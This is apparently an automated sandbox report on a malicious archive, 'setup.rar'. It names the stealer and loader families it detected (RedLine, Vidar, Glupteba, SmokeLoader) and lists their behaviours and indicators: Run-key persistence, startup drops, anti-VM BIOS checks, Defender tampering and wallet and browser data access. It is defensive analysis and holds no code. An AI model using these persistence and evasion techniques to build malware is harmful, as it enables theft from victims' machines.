Analysis Overview
SHA256
1cd649ea4273fd977b6a350bfe8f3b62f1d0aee1408b9966aa3d6ad39ba5af6a
Threat Level: Known bad
The file setup.rar was found to be: Known bad.
Malicious Activity Summary
MetaSploit
RedLine Payload
Glupteba Payload
Modifies Windows Defender Real-time Protection settings
RedLine
Glupteba
Process spawned unexpected child process
Vidar
NetSupport
Suspicious use of NtCreateProcessExOtherParentProcess
Socelars
SmokeLoader
Raccoon
Nirsoft
Vidar Stealer
Checks for common network interception software
Identifies VirtualBox via ACPI registry values (likely anti-VM)
Executes dropped EXE
Downloads MZ/PE file
Blocklisted process makes network request
UPX packed file
Drops file in Drivers directory
Loads dropped DLL
Drops startup file
Checks BIOS information in registry
Themida packer
Reads user/profile data of web browsers
Looks up external IP address via web service
Checks whether UAC is enabled
Enumerates connected drives
Checks installed software on the system
Adds Run key to start application
Accesses cryptocurrency files/wallets, possible credential harvesting
Legitimate hosting services abused for malware hosting/C2
Suspicious use of NtSetInformationThreadHideFromDebugger
Drops file in System32 directory
Suspicious use of SetThreadContext
Drops file in Windows directory
Drops file in Program Files directory
Enumerates physical storage devices
Program crash
Modifies system certificate store
Checks processor information in registry
Suspicious use of FindShellTrayWindow
Enumerates system info in registry
Modifies data under HKEY_USERS
Checks SCSI registry key(s)
Suspicious behavior: GetForegroundWindowSpam
Modifies registry class
Suspicious use of WriteProcessMemory
Creates scheduled task(s)
Script User-Agent
Suspicious behavior: MapViewOfSection
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: SetClipboardViewer
Suspicious use of AdjustPrivilegeToken
Suspicious use of SetWindowsHookEx
Suspicious use of SendNotifyMessage
Kills process with taskkill
Modifies Internet Explorer settings
Runs ping.exe
MITRE ATT&CK Matrix V6
Analysis: static1
Detonation Overview
Reported
2021-08-24 08:16
Signatures
Analysis: behavioral4
Detonation Overview
Submitted
2021-08-24 08:16
Reported
2021-08-24 08:46
Platform
win11
Max time kernel
666s
Max time network
1766s
Command Line
Signatures
Glupteba
Glupteba Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
MetaSploit
Modifies Windows Defender Real-time Protection settings
NetSupport
Process spawned unexpected child process
| Description | Indicator | Process | Target |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\rundll32.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\rundll32.exe |
RedLine
RedLine Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
SmokeLoader
Socelars
Suspicious use of NtCreateProcessExOtherParentProcess
Vidar
Checks for common network interception software
Identifies VirtualBox via ACPI registry values (likely anti-VM)
Vidar Stealer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Blocklisted process makes network request
Downloads MZ/PE file
Drops file in Drivers directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\system32\drivers\etc\hosts | C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\SETBF83.tmp | C:\Windows\system32\DrvInst.exe | N/A |
| File created | C:\Windows\System32\drivers\SETBF83.tmp | C:\Windows\system32\DrvInst.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\tap0901.sys | C:\Windows\system32\DrvInst.exe | N/A |
Executes dropped EXE
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\Documents\7y5Vp6Y4Dw__GrMpFc7jH5oK.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\Documents\2OqLhCZhB1J2lBUhFb9Agohl.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\Documents\_PK48c3vqpoBrX6WxswIz72H.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\Documents\tu26dSuvrMVfSvTUy3rQdUyV.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\Documents\GMN67w60Y75ZSdIVX8YgBso4.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\Documents\jhDwcYdK5RiPAIK7zX1tJzEA.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\Documents\ntJDMNRx5VTIu4t3_P3EM6tB.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\Documents\RNTB49eKKssmauRCW_m9c79F.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\Documents\7y5Vp6Y4Dw__GrMpFc7jH5oK.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\Documents\CnBLlchd7TCDLhvqtxGvhC0e.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\Documents\P64NJfK8X91BmMbXGQCgnQbs.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\Documents\2OqLhCZhB1J2lBUhFb9Agohl.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\Documents\CnBLlchd7TCDLhvqtxGvhC0e.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\Documents\tu26dSuvrMVfSvTUy3rQdUyV.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\Documents\P64NJfK8X91BmMbXGQCgnQbs.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\Documents\GMN67w60Y75ZSdIVX8YgBso4.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\Documents\jhDwcYdK5RiPAIK7zX1tJzEA.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\Documents\ntJDMNRx5VTIu4t3_P3EM6tB.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\Documents\RNTB49eKKssmauRCW_m9c79F.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\Documents\_PK48c3vqpoBrX6WxswIz72H.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\7753.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\7753.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fastsystem2021.exe | C:\Program Files (x86)\Company\NewProduct\customer3.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fastsystem2021.exe | C:\Program Files (x86)\Company\NewProduct\customer3.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\iZpAWbaURv.url | C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com | N/A |
Loads dropped DLL
Reads user/profile data of web browsers
Themida packer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Accesses cryptocurrency files/wallets, possible credential harvesting
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Cleaner = "C:\\Users\\Admin\\AppData\\Roaming\\Cleaner\\Cleaner.exe --anbfs" | C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\RequiredApplication_1\Cleaner_Installation.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run\WinHost = "C:\\Users\\Admin\\AppData\\Roaming\\WinHost\\WinHoster.exe" | C:\Users\Admin\AppData\Roaming\2684263.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\WindowsPowerShell\\Fimypujudae.exe\"" | C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run\MicrosoftEdgeAutoLaunch_5EFC0ECB77A7585FE9DCDD0B2E946A2B = "\"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe\" --no-startup-window /prefetch:5" | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run | C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\aipackagechainer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run\ | C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\aipackagechainer.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run | C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\RequiredApplication_1\Cleaner_Installation.exe | N/A |
Checks installed software on the system
Checks whether UAC is enabled
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\Documents\CnBLlchd7TCDLhvqtxGvhC0e.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\Documents\2OqLhCZhB1J2lBUhFb9Agohl.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\Documents\jhDwcYdK5RiPAIK7zX1tJzEA.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\Documents\ntJDMNRx5VTIu4t3_P3EM6tB.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\Documents\_PK48c3vqpoBrX6WxswIz72H.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\Documents\7y5Vp6Y4Dw__GrMpFc7jH5oK.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\Documents\P64NJfK8X91BmMbXGQCgnQbs.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\Documents\GMN67w60Y75ZSdIVX8YgBso4.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\Documents\RNTB49eKKssmauRCW_m9c79F.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\AppData\Local\Temp\7753.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\Documents\tu26dSuvrMVfSvTUy3rQdUyV.exe | N/A |
Enumerates connected drives
Legitimate hosting services abused for malware hosting/C2
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | api.db-ip.com | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | api.db-ip.com | N/A | N/A |
| N/A | ip-api.com | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\System32\DriverStore\Temp\{10c241fa-9eb7-7e4d-b5c6-a21d876c9672}\SETAC99.tmp | C:\Windows\system32\DrvInst.exe | N/A |
| File opened for modification | C:\Windows\System32\DriverStore\FileRepository\oemvista.inf_amd64_a572b7f20c402d28\tap0901.sys | C:\Windows\system32\DrvInst.exe | N/A |
| File created | C:\Windows\System32\DriverStore\Temp\{10c241fa-9eb7-7e4d-b5c6-a21d876c9672}\SETAC88.tmp | C:\Windows\system32\DrvInst.exe | N/A |
| File created | C:\Windows\System32\DriverStore\Temp\{10c241fa-9eb7-7e4d-b5c6-a21d876c9672}\SETAC89.tmp | C:\Windows\system32\DrvInst.exe | N/A |
| File opened for modification | C:\Windows\System32\DriverStore\Temp\{10c241fa-9eb7-7e4d-b5c6-a21d876c9672}\SETAC99.tmp | C:\Windows\system32\DrvInst.exe | N/A |
| File opened for modification | C:\Windows\System32\DriverStore\Temp\{10c241fa-9eb7-7e4d-b5c6-a21d876c9672}\tap0901.sys | C:\Windows\system32\DrvInst.exe | N/A |
| File created | C:\Windows\System32\DriverStore\drvstore.tmp | C:\Windows\system32\DrvInst.exe | N/A |
| File opened for modification | C:\Windows\System32\DriverStore\Temp\{10c241fa-9eb7-7e4d-b5c6-a21d876c9672}\SETAC88.tmp | C:\Windows\system32\DrvInst.exe | N/A |
| File opened for modification | C:\Windows\System32\DriverStore\Temp\{10c241fa-9eb7-7e4d-b5c6-a21d876c9672}\oemvista.inf | C:\Windows\system32\DrvInst.exe | N/A |
| File opened for modification | C:\Windows\System32\DriverStore\FileRepository\oemvista.inf_amd64_a572b7f20c402d28\tap0901.cat | C:\Windows\system32\DrvInst.exe | N/A |
| File opened for modification | C:\Windows\System32\CatRoot2\dberr.txt | C:\Windows\system32\DrvInst.exe | N/A |
| File created | C:\Windows\System32\DriverStore\FileRepository\oemvista.inf_amd64_a572b7f20c402d28\oemvista.PNF | C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe | N/A |
| File opened for modification | C:\Windows\System32\DriverStore\Temp\{10c241fa-9eb7-7e4d-b5c6-a21d876c9672}\SETAC89.tmp | C:\Windows\system32\DrvInst.exe | N/A |
| File opened for modification | C:\Windows\System32\DriverStore\Temp\{10c241fa-9eb7-7e4d-b5c6-a21d876c9672}\tap0901.cat | C:\Windows\system32\DrvInst.exe | N/A |
| File opened for modification | C:\Windows\System32\DriverStore\FileRepository\oemvista.inf_amd64_a572b7f20c402d28\oemvista.inf | C:\Windows\system32\DrvInst.exe | N/A |
| File opened for modification | C:\Windows\System32\DriverStore\Temp\{10c241fa-9eb7-7e4d-b5c6-a21d876c9672} | C:\Windows\system32\DrvInst.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
Suspicious use of SetThreadContext
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File created | C:\Program Files (x86)\MaskVPN\is-R427V.tmp | C:\Users\Admin\AppData\Local\Temp\is-5S9HJ.tmp\Setup.tmp | N/A |
| File created | C:\Program Files (x86)\MaskVPN\is-TB7D9.tmp | C:\Users\Admin\AppData\Local\Temp\is-5S9HJ.tmp\Setup.tmp | N/A |
| File created | C:\Program Files (x86)\MaskVPN\driver\win764\is-OD2AO.tmp | C:\Users\Admin\AppData\Local\Temp\is-5S9HJ.tmp\Setup.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe | C:\Users\Admin\AppData\Local\Temp\is-OTSK0.tmp\Setup.exe | N/A |
| File opened for modification | C:\Program Files (x86)\MaskVPN\driver\win732\tapinstall.exe | C:\Users\Admin\AppData\Local\Temp\is-5S9HJ.tmp\Setup.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\MaskVPN\polstore.dll | C:\Users\Admin\AppData\Local\Temp\is-5S9HJ.tmp\Setup.tmp | N/A |
| File created | C:\Program Files (x86)\MaskVPN\driver\winxp32\is-RHVF2.tmp | C:\Users\Admin\AppData\Local\Temp\is-5S9HJ.tmp\Setup.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\Company\NewProduct\d.INTEG.RAW | C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe | N/A |
| File opened for modification | C:\Program Files (x86)\MaskVPN\mask_svc.exe | C:\Users\Admin\AppData\Local\Temp\is-5S9HJ.tmp\Setup.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\MaskVPN\driver\winxp32\devcon.exe | C:\Users\Admin\AppData\Local\Temp\is-5S9HJ.tmp\Setup.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe | C:\Users\Admin\AppData\Local\Temp\is-OTSK0.tmp\Setup.exe | N/A |
| File created | C:\Program Files (x86)\MaskVPN\is-NG8IE.tmp | C:\Users\Admin\AppData\Local\Temp\is-5S9HJ.tmp\Setup.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe | C:\Users\Admin\AppData\Local\Temp\is-OTSK0.tmp\Setup.exe | N/A |
| File opened for modification | C:\Program Files (x86)\GameBox INC\GameBox\PBrowFile15.exe | C:\Users\Admin\AppData\Local\Temp\is-OTSK0.tmp\Setup.exe | N/A |
| File created | C:\Program Files (x86)\MaskVPN\driver\win732\is-T81NQ.tmp | C:\Users\Admin\AppData\Local\Temp\is-5S9HJ.tmp\Setup.tmp | N/A |
| File created | C:\Program Files\Windows Media Player\NABQKOXRFC\ultramediaburner.exe.config | C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Company\NewProduct\jooyu.exe | C:\Users\Admin\Documents\x6Hnh70y97fx0Du2lrfFW9jg.exe | N/A |
| File opened for modification | C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe | C:\Users\Admin\AppData\Local\Temp\is-OTSK0.tmp\Setup.exe | N/A |
| File opened for modification | C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe | C:\Users\Admin\AppData\Local\Temp\is-OTSK0.tmp\Setup.exe | N/A |
| File created | C:\Program Files (x86)\Sofware IN LLC\is-ABP29.tmp | C:\Users\Admin\AppData\Local\Temp\is-JT7OM.tmp\Setup.tmp | N/A |
| File created | C:\Program Files (x86)\Company\NewProduct\Uninstall.ini | C:\Users\Admin\Documents\x6Hnh70y97fx0Du2lrfFW9jg.exe | N/A |
| File created | C:\Program Files (x86)\Company\NewProduct\tmp.edb | C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe | N/A |
| File opened for modification | C:\Program Files (x86)\GameBox INC\GameBox\Stats.exe | C:\Users\Admin\AppData\Local\Temp\is-I61CT.tmp\Setup.exe | N/A |
| File opened for modification | C:\Program Files (x86)\GameBox INC\GameBox\runvd.exe | C:\Users\Admin\AppData\Local\Temp\is-OTSK0.tmp\Setup.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Sofware IN LLC\javaw.exe | C:\Users\Admin\AppData\Local\Temp\is-JT7OM.tmp\Setup.tmp | N/A |
| File created | C:\Program Files (x86)\Sofware IN LLC\is-EB5PD.tmp | C:\Users\Admin\AppData\Local\Temp\is-JT7OM.tmp\Setup.tmp | N/A |
| File created | C:\Program Files (x86)\MaskVPN\driver\winxp64\is-9P9R8.tmp | C:\Users\Admin\AppData\Local\Temp\is-5S9HJ.tmp\Setup.tmp | N/A |
| File created | C:\Program Files (x86)\MaskVPN\is-22V8Q.tmp | C:\Users\Admin\AppData\Local\Temp\is-5S9HJ.tmp\Setup.tmp | N/A |
| File created | C:\Program Files (x86)\MaskVPN\is-EFE95.tmp | C:\Users\Admin\AppData\Local\Temp\is-5S9HJ.tmp\Setup.tmp | N/A |
| File created | C:\Program Files (x86)\MaskVPN\driver\win732\is-5IVSQ.tmp | C:\Users\Admin\AppData\Local\Temp\is-5S9HJ.tmp\Setup.tmp | N/A |
| File created | C:\Program Files (x86)\MaskVPN\unins000.msg | C:\Users\Admin\AppData\Local\Temp\is-5S9HJ.tmp\Setup.tmp | N/A |
| File created | C:\Program Files (x86)\GameBox INC\GameBox\Uninstall.ini | C:\Users\Admin\AppData\Local\Temp\is-OTSK0.tmp\Setup.exe | N/A |
| File opened for modification | C:\Program Files (x86)\MaskVPN\ipseccmd.exe | C:\Users\Admin\AppData\Local\Temp\is-5S9HJ.tmp\Setup.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe | C:\Users\Admin\AppData\Local\Temp\is-5S9HJ.tmp\Setup.tmp | N/A |
| File created | C:\Program Files (x86)\MaskVPN\driver\winxp64\is-3F2O1.tmp | C:\Users\Admin\AppData\Local\Temp\is-5S9HJ.tmp\Setup.tmp | N/A |
| File created | C:\Program Files (x86)\MaskVPN\driver\winxp64\is-LEEMT.tmp | C:\Users\Admin\AppData\Local\Temp\is-5S9HJ.tmp\Setup.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\MaskVPN\unins000.dat | C:\Users\Admin\AppData\Local\Temp\is-5S9HJ.tmp\Setup.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\Company\NewProduct\Uninstall.exe | C:\Users\Admin\Documents\x6Hnh70y97fx0Du2lrfFW9jg.exe | N/A |
| File opened for modification | C:\Program Files (x86)\GameBox INC\GameBox\LivelyScreenRecS1.9.exe | C:\Users\Admin\AppData\Local\Temp\is-OTSK0.tmp\Setup.exe | N/A |
| File opened for modification | C:\Program Files (x86)\MaskVPN\tunnle.exe | C:\Users\Admin\AppData\Local\Temp\is-5S9HJ.tmp\Setup.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\GameBox INC\GameBox\xtect12.exe | C:\Users\Admin\AppData\Local\Temp\is-OTSK0.tmp\Setup.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Company\NewProduct\d | C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe | N/A |
| File created | C:\Program Files (x86)\MaskVPN\driver\winxp32\is-88641.tmp | C:\Users\Admin\AppData\Local\Temp\is-5S9HJ.tmp\Setup.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\GameBox INC\GameBox\Uninstall.exe | C:\Users\Admin\AppData\Local\Temp\is-OTSK0.tmp\Setup.exe | N/A |
| File created | C:\Program Files (x86)\MaskVPN\driver\win732\is-OFPSP.tmp | C:\Users\Admin\AppData\Local\Temp\is-5S9HJ.tmp\Setup.tmp | N/A |
| File created | C:\Program Files (x86)\UltraMediaBurner\unins000.dat | C:\Users\Admin\AppData\Local\Temp\is-P9QUF.tmp\ultramediaburner.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\MaskVPN\libeay32.dll | C:\Users\Admin\AppData\Local\Temp\is-5S9HJ.tmp\Setup.tmp | N/A |
| File created | C:\Program Files (x86)\MaskVPN\is-CQ3K2.tmp | C:\Users\Admin\AppData\Local\Temp\is-5S9HJ.tmp\Setup.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\Sofware IN LLC\libcueify.dll | C:\Users\Admin\AppData\Local\Temp\is-JT7OM.tmp\Setup.tmp | N/A |
| File created | C:\Program Files (x86)\MaskVPN\is-DOI9U.tmp | C:\Users\Admin\AppData\Local\Temp\is-5S9HJ.tmp\Setup.tmp | N/A |
| File created | C:\Program Files (x86)\MaskVPN\is-VI0SQ.tmp | C:\Users\Admin\AppData\Local\Temp\is-5S9HJ.tmp\Setup.tmp | N/A |
| File created | C:\Program Files (x86)\MaskVPN\driver\winxp64\is-OVGS0.tmp | C:\Users\Admin\AppData\Local\Temp\is-5S9HJ.tmp\Setup.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\MaskVPN\libMaskVPN.dll | C:\Users\Admin\AppData\Local\Temp\is-5S9HJ.tmp\Setup.tmp | N/A |
| File created | C:\Program Files (x86)\MaskVPN\is-9F42C.tmp | C:\Users\Admin\AppData\Local\Temp\is-5S9HJ.tmp\Setup.tmp | N/A |
| File created | C:\Program Files (x86)\MaskVPN\driver\win764\is-DL35H.tmp | C:\Users\Admin\AppData\Local\Temp\is-5S9HJ.tmp\Setup.tmp | N/A |
| File created | C:\Program Files (x86)\MaskVPN\is-V8TJB.tmp | C:\Users\Admin\AppData\Local\Temp\is-5S9HJ.tmp\Setup.tmp | N/A |
| File created | C:\Program Files (x86)\MaskVPN\driver\win764\is-C35S0.tmp | C:\Users\Admin\AppData\Local\Temp\is-5S9HJ.tmp\Setup.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe | C:\Users\Admin\AppData\Local\Temp\is-P9QUF.tmp\ultramediaburner.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\Company\NewProduct\customer3.exe | C:\Users\Admin\Documents\x6Hnh70y97fx0Du2lrfFW9jg.exe | N/A |
| File created | C:\Program Files (x86)\Sofware IN LLC\is-L9M3Q.tmp | C:\Users\Admin\AppData\Local\Temp\is-JT7OM.tmp\Setup.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\MaskVPN\MaskVPN.exe | C:\Users\Admin\AppData\Local\Temp\is-5S9HJ.tmp\Setup.tmp | N/A |
| File created | C:\Program Files (x86)\MaskVPN\driver\winxp64\is-TE6KC.tmp | C:\Users\Admin\AppData\Local\Temp\is-5S9HJ.tmp\Setup.tmp | N/A |
| File created | C:\Program Files (x86)\UltraMediaBurner\is-3DPO3.tmp | C:\Users\Admin\AppData\Local\Temp\is-P9QUF.tmp\ultramediaburner.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\UltraMediaBurner\unins000.dat | C:\Users\Admin\AppData\Local\Temp\is-P9QUF.tmp\ultramediaburner.tmp | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\Installer\MSIBA0A.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI3F77.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\inf\oem2.inf | C:\Windows\system32\DrvInst.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSIC382.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Installer\SourceHash{B59E6947-D960-4A88-902E-F387AFD7DF1F} | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\SystemTemp\~DF63E847A9FECF1714.TMP | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\LOGS\DPX\setupact.log | C:\Windows\SysWOW64\expand.exe | N/A |
| File opened for modification | C:\Windows\LOGS\DPX\setuperr.log | C:\Windows\SysWOW64\expand.exe | N/A |
| File opened for modification | C:\Windows\Installer\f764ac1.msi | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSIC093.tmp | C:\Windows\system32\msiexec.exe | N/A |
